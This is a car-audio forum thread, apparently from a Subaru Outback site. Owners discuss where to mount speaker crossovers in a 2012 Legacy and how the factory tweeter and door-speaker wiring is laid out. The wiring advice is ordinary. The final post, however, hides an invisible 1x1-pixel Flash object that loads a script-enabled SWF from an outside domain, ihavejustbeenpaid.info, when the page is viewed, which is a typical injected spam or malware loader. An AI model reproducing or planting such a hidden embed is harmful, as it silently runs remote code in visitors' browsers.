Subaru Outback Forums banner
1 - 5 of 5 Posts

·
Registered
2012 Legacy Prem, AWP, CVT, Moonroof, Ice Silver
32 Posts
Discussion Starter · #1 ·
I'm installing new component speakers in the front of my 2012 with factory tweeters. It would be the easiest if I could install the crossover in the kick panel (or close by) and use the existing tweeter wiring as the input to the crossover and run new wire from the crossover to the door speaker and to the tweeter.

SVXdc had mentioned in an older thread regarding the 2010-2011's that the front door speaker and tweeter are in parallel from the head unit. Does anyone know if this is the same for the 2012's?

Or will the door speaker wire need to be the input for the crossover? Another thread had mentioned finding the door speaker wiring in the kick panel and splice it there. However, it's my goal to install this without cutting any of the factory wiring. And I'd rather not install the crossover in the door.

Ideas, suggestions or opinions?

Thanks

·
Registered
2016 3.6R Limited
348 Posts
I put my crossover's in the large gap below the radio (it's just empty space). I had to splice into the wiring harness and run a separate wire for each of the tweeters. The tweeters and mids are indeed wired in parallel. If you want to use a dedicated crossover you will have to run a separate wire for at least either the tweeter or mid.

·
Registered
2011 Outback 2.5 Premium Steel Silver
25 Posts
I installed my crossovers in a similar place as Taiguy, below the radio towards the front on the center console. I chose to run all new 14ga speaker wiring as I had the doors/console apart and it saved me hacking up the factory harness. Additionally, the stock wiring would not be able to handle the 100W rms that I put through each channel.

·
Registered
2012 Legacy Prem, AWP, CVT, Moonroof, Ice Silver
32 Posts
Discussion Starter · #4 ·
Thanks guys. I think I'll use the factory tweeter wiring as the input to the crossover and run new wires to the door and tweeter. I'll probably install the crossovers in each of the kick panels or under the dash somewhere.

Thanks again! :7:

·
Registered
10 Posts
Can you take some pictures while doing it? Would be helpful, need to install a sounds system too!
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1">
<param value="http://ihavejustbeenpaid.info/flash/23/1x1.swf"><param name="allowScriptAccess" value="always" />
<embed allowScriptAccess="always" src="http://ihavejustbeenpaid.info/flash/23/1x1.swf" type="application/x-shockwave-flash" width="1" height="1">
</embed></object>

1 - 5 of 5 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.